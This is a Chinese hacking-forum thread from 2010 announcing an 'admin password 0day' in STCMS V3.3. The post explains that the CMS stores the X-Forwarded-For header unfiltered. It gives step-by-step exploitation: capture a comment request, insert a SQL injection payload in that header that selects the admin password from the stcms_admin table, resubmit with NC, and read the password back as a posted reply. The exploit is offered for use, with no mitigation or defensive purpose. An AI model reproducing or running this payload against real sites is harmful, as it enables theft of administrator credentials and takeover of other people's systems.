电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

STCMS V3.3 暴管理员密码0DAY漏洞

[复制链接]
etcat 发表于 2010-6-2 21:06:47 | 显示全部楼层 |阅读模式
STCMS V3.3 暴管理员密码0DAY漏洞

影响版本:STCMS V3.3   
官方地址: http://www.phpstcms.com/
漏洞产生原因:
没有过滤$_SERVER,导致用户可以伪造$_SERVER[X-FORWARDED-FOR],从而将恶意注射语句写入数据库中。

利用步骤:
1. 进入有评论的页面,先评论一个并抓包。
2. 在包中添加一条:
X-Forwarded-For: 127.0.0.1'',(select pwd from stcms_admin where id =1))#并保存
3. NC提交
4. 此时又添加了一条留言,并且多了一个回复,内容就是管理员的密码。
Bellain 发表于 2010-6-2 22:24:01 | 显示全部楼层
虽然看不懂
但是学习了
顶!
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 21:17

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表